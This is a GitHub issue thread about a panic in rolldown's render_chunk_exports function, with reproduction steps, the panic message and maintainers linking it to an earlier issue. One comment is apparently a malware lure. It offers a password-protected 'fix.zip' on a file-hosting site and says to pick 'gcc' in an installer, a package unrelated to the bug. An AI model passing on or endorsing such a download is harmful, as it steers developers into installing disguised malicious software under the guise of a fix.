### ISSUE TITLE
[Bug]: panic in `render_chunk_exports`

### ISSUE THREAD

**Issue by Boshen** [rolldown/rolldown#2085]
### Reproduction link or steps

I'm testing rolldown in https://github.com/oxc-project/monitor-oxc

Change dependency to a local build:
```
  "dependencies": {
    "rolldown": "link:../../github/rolldown/packages/rolldown",
```

```
pnpm install
pnpm run rolldown
```

### What is expected?

No panic

### What is actually happening?

https://github.com/rolldown/rolldown/blob/02059832b3cce75498fb19ccfe6f9537421dd057/crates/rolldown/src/utils/chunk/render_chunk_exports.rs#L31

```
thread 'tokio-runtime-worker' panicked at crates/rolldown/src/utils/chunk/render_chunk_exports.rs:31:54:
no entry found for key
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
```

### System Info

```Shell
None
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hi-ogawa** [comment]
This also had a panic at the same place https://github.com/rolldown/rolldown/issues/1722

**Comment by IWANABETHATGUY** [comment]
> This also had a panic at the same place #1722

looks like it is the same reason.
